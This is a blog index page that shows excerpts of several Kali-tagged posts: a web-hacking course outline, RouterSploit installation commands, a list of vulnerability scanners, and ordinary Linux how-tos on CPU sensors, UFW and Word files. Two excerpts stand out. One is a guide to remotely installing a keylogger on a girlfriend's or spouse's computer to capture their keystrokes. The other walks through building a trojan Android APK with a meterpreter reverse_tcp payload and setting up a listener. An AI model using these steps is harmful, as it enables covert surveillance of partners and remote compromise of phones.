Skip to main content

Posts

Showing posts with the label kali

Learn how to hack websites and web applications like black hat hackers, and how to secure them like security experts.

Learn how to hack websites and web applications like black hat hackers, and how to secure them like security experts. What you’ll learn Install hacking lab & needed software (works on Windows, OS X and Linux). Discover, exploit and mitigate a number of dangerous vulnerabilities. Use advanced techniques to discover and exploit these vulnerabilities. Bypass security measurements and escalate privileges. Intercept requests using a proxy. Hack all websites on same server. Bypass filters and client-side security Adopt SQL queries to discover and exploit SQL injections in secure pages Gain full control over target server using SQL injections Discover & exploit blind SQL injections Install Kali Linux – a penetration testing operating system Install windows & vulnerable operating systems as virtual machines for testing Learn linux commands and how to interact with the terminal Learn linux basics Understand how websites & web applications work Unde

routersploit: Router Exploitation Framework

  RouterSploit  Router Exploitation Framework github download source Installation Requirements gnureadline (OSX only) requests paramiko beautifulsoup4 pysnmp Installation on Kali git clone https://github.com/reverse-shell/routersploit cd routersploit ./rsf.py Installation on Ubuntu 16.04 sudo apt-get install python-dev python-pip libncurses5-dev git git clone https://github.com/reverse-shell/routersploit cd routersploit pip install -r requirements.txt ./rsf.py Installation on OSX git clone https://github.com/reverse-shell/routersploit cd routersploit sudo easy_install pip sudo pip install -r requirements.txt ./rsf.py Running on Docker git clone https://github.com/reverse-shell/routersploit cd routersploit docker build -t routersploit:latest -f Dockerfile . ./run_docker.sh Update Update RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day. cd routersploit git pull Usage root@ka

Best Vulnerability Scanners Tools

Best Vulnerability Scanners Tools    The scanners which assess the vulnerability of a network or a computer to security attacks are known as Vulnerability Scanners. The tools might function differently, however all of them aim to provide an analysis on how vulnerable the system or a network is. Here is a list of the best ones:   Nessus Nessus is the world’s most popular vulnerable scanner topping the list in the years 2000, 2003 and in the year 2006 survey on security tools. It’s a free to use vulnerability scanner for personal use in the non enterprise environment. OpenVAS This scanner is tipped by many to be the most advanced vulnerability scanner in the world and is a powerful and comprehensive tool for scanning as well as providing solutions for vulnerability management. It is free software and is maintained daily. Nipper It is a parser for network infrastructure and its full form is Network Infrastructure Parser. This open source scanner he

How can I monitor the CPU temperature under linux?

How can I monitor the CPU temperature under linux  i'll explain in this post how can you monitor the cpu temperature by different methods method 1 you need the lm-sensors package.  I thought I should mention that in addition to installing the package, you should run the sensors-detect command to identify the kernel modules that need to be loaded.  If you haven't done this, manually run this once and check if it detects any sensors on board your computer. $ sudo sensors-detect # sensors-detect revision 5249 (2008-05-11 22:56:25 +0200) This program will help you determine which kernel modules you need to load to use lm_sensors most effectively. It is generally safe and recommended to accept the default answers to all questions, unless you know what you're doing.     If you're lucky, your laptop will support an array of sensors. If not, you may still find a basic set of sensors for the CPU:     $ sensors acpitz-virtual-0 Adap

How to Remotely Install a Keylogger onto Your Girlfriend's Computer

How to Remotely Install a Keylogger onto Your Girlfriend's Computer Welcome back, my greenhorn hackers! Several of you have you have emailed me asking whether it's possible to install a keylogger on a victim's computer using Metasploit. The answer is a resounding "YES"! So, by popular request, in this guide I'll show you how to install a keylogger on your girlfriend's, boyfriend's, wife's, or husband's computer. For those of you wondering what a keylogger is, the simple answer is that it's a piece of software or hardware that captures every keystroke and saves them for retrieval by you, the attacker. These types of devices have long been used by hackers to capture logins, passwords, social security numbers, etc. Here we will use it to capture the keystrokes of a cheating girlfriend. S

Hack Android Using Kali (Remotely)

Hack Android Using Kali (Remotely) Hello Hackers! Welcome to arab black hat blog: This is a tutorial explaining how to hack android phones with Kali. I can't see any tutorials explaining this Hack/Exploit, so, I made one. ( Still ,you may already know about this ) Step 1: Fire-Up Kali: Open a terminal, and make a Trojan .apk You can do this by typing : msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP) You can also hack android on WAN i.e. through Interet by using your Public/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section) Step 2: Open Another Terminal: Open another terminal until the file is being produced. Load metasploit console, by typing : msfconsole Step 3: Set-Up a Listener: After it

How To Setup a Firewall with UFW on an Ubuntu and Debian Cloud Server

Introduction One of the first lines of defense in securing your cloud server is a functioning firewall. In the past, this was often done through complicated and arcane utilities. There is a lot of functionality built into these utilities, iptables being the most popular nowadays, but they require a decent effort on behalf of the user to learn and understand them. Firewall rules are not something you want yourself second-guessing. To this end, UFW is a considerably easier-to-use alternative. What is UFW? UFW, or Uncomplicated Firewall, is a front-end to iptables. Its main goal is to make managing your firewall drop-dead simple and to provide an easy-to-use interface. It’s well-supported and popular in the Linux community—even installed by default in a lot of distros. As such, it’s a great way to get started securing your sever. Before We Get Started First, obviously, you want to make sure UFW is installed. It should be installed by default in Ubuntu,

How to open Microsoft Word documents in Linux

How to open Microsoft Word documents in Linux In an office or production environment, sharing documents between different applications and operating systems is a common issue. For creating, opening, and editing Microsoft Word Documents in Linux, LibreOffice Writer and AbiWord are robust word processing applications that can read and write files in Word .doc and .docx formats. If you need command-line tools that extract the text from Word files, Antiword (.doc files) and docx2txt (.docx) are useful programs to have at your disposal. In this tutorial, we'll look at these four applications and how you can use them. We'll walk through installing them on several of the most popular Linux distributions, including Debian , Ubuntu , Fedora , OpenSUSE , CentOS , and Arch Linux , and installing the core Microsoft TrueType fonts on your Linux system. Quick Links LibreOffice AbiWord Antiword (.doc -> text) Docx2txt (.docx -> te